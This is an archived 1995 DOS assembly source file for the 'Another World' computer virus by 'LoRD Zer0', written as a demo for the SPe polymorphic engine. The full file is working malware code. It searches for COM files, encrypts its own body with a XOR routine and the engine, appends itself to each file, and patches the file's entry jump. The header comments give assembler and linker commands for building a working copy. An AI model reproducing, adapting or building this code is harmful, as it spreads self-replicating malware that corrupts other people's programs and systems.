home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / PMUPDT13.ZIP / SPE.ZIP / SPE_V121.ZIP / DEMO.ASM next >
Encoding:
Assembly Source File  |  1995-04-16  |  3.1 KB  |  189 lines
  1.  
  2. ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  3. ;                                          ;
  4. ;                                          ;
  5. ;               A n o t h e r  W o r l d                  ;
  6. ;                                          ;
  7. ;                                          ;
  8. ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  9.  
  10.  
  11. ; Virus name: Another World
  12. ; Origin: Sweden
  13. ; Engine: SPe v1.21 (Simple Polymorphic Engine)
  14. ; Author: LoRD Zer0
  15. ; Date: Mars 1995
  16. ; Eff length: 705 - 709 bytes
  17. ; SPe is 419 bytes
  18. ; AW is 269 bytes
  20. ; It's a none resident COM file infector. With no extra effects.
  21. ; It's just a demo vx for SPe. (SPe is a lame Engine. It's made just for
  22. ; Fun. I've get a bit tried of my real polymorphic Engine, Genetic eXchanger.)
  23. ; Well, One TridenT guy wrote a polymorphic vx in 444 bytes, So this is no 
  24. ; record.
  25. ; The vx isn't so well comentated, because a normal vx coder will have no 
  26. ; problem to understand the code except comments.
  28. ; B.BIN :
  29.  
  30. ; DB 40h,0E9h,0,0
  31.  
  32. ; To make a working copy of the virus:
  33. ; tasm /m2 spe.asm
  34. ; tasm /m2 demo.asm
  35. ; tlink /t demo.obj
  36. ; tlink /t spe.obj
  37. ; copy /b b.bin+demo.com vx.com
  38. ; copy /b vx.com+spe.com another.com
  39. ;
  40. ;
  41.     .MoDEL TiNY
  42.     .CoDE
  43.     org    100h
  44. Start:
  45.     mov    di,100h
  46.     call    begin
  47. Begin:    pop    bp
  48.     sub    bp,offset begin
  49.     lea    si,[bp+buffer]
  50.     movsw
  51.     movsw
  52.  
  53.     mov    ah,1ah
  54.     lea    dx,[bp+DTA]
  55.     int    21h
  56.  
  57.     lea    dx,[bp+Comfile]
  58.     xor    cx,cx
  59.     mov    ah,4eh
  60. again:
  61.     int    21h
  62.     jnc    not_done
  63.     jmp    done
  64. not_done:
  65.  
  66.     lea    dx,[fname+bp]
  67.     mov    ax,3D02h
  68.     int    21h
  69.  
  70.     xchg    bx,ax
  71.  
  72.     mov    ah,3fh
  73.     lea    dx,[bp+buffer]
  74.     mov    cx,4
  75.     int    21h
  76.  
  77.     cmp    byte ptr [buffer+bp],40h
  78.     jne    go_on
  79. loop_me:
  80.     call    close
  81.     mov    ah,4fh
  82.     jmp    again
  83. comfile    db    '*.com',0
  84. buffer    db    0CDh,20h,0,0
  85.     db    'Another World, a Better World..',0    ;Well, perhaps..
  86. go_on:
  87.  
  88.     cmp    word ptr [buffer+bp],'ZM'
  89.     je    loop_me
  90.  
  91.     mov    ax,4202h
  92.     cwd
  93.     xor    cx,cx
  94.     int    21h
  95.  
  96.     mov    si,ax
  97.     add    si,100h
  98.     sub    ax,4
  99.     mov    word ptr [new_jmp+bp],0e940h    ;40h = INC AX
  100.     mov    word ptr [new_jmp+bp+2],ax
  101.  
  102.     mov    cx,v_Size
  103.     lea    di,[work_space+bp+100h]
  104.     push    di
  105.     push    bx
  106.     push    bp
  107.     call    Engine
  108.     pop    bp
  109.     pop    bx
  110.     cmp    ah,0
  111.     jnz    ma
  112.     mov    ah,28h
  113.     jmp    store
  114. ma:
  115.     cmp    ah,28h
  116.     jnz    store
  117.     xor    ah,ah
  118. store:
  119.     mov    [bp+to_do],ah
  120.     lea    si,[bp+start]
  121.     cld
  122.     xchg    al,ah
  123.     xchg    dx,cx
  124.     push    cx
  125.     push    cs
  126.     pop    es
  127.     cld
  128. xor_me:
  129.     lodsb
  130. to_do    db    30h            ; XOR
  131.     db    0E0h            ; AL,AH
  132.     stosb
  133.     loop    xor_me
  134.     pop    cx
  135.     add    cx,dx
  136.     pop    dx
  137.     mov    ah,40h
  138.     int    21h
  139.     jc    close_me
  140.  
  141.     mov    ax,4200h
  142.     cwd
  143.     xor    cx,cx
  144.     int    21h
  145.  
  146.     lea    dx,[new_jmp+bp]
  147.     mov    cx,4
  148.     mov    ah,40h
  149.     int    21h
  150.  
  151. close_me:
  152.     call    close
  153. done:
  154.     mov    dx,80h
  155.     mov    ah,1ah
  156.     int    21h
  157.  
  158.     mov    ax,100h
  159.     push    ax
  160.     xor    ax,ax
  161.     ret
  162.     db    'WHY?'        ;It's a good question...
  163. close:
  164.     mov    ax,5700h
  165.     int    21h
  166.     inc    ax
  167.     int    21h
  168.  
  169.     mov    ah,3eh
  170.     int    21h
  171.     retn
  172. Engine:
  173. ; COPY /B DEMO.COM+SPE.COM V.COM
  174. the_end:
  175. new_jmp        = offset the_end+200h ; 200h for the engine    
  176. DTA        = offset offset New_jmp+4
  177. fattrib        = offset DTA+21
  178. ftime        = offset fAttrib+1
  179. fdate        = offset Ftime +2
  180. Fsize        = offset Fdate+2
  181. fname        = offset Fsize+4
  182. work_Space    = offset fname+14
  183. v_size    =    $-offset start
  184.     end    Start
  185.  
  186.  
  187.  Coded by LoRD Zer0 1994-95.
  188.  Somewhere in the kingdom of Sweden....
  189.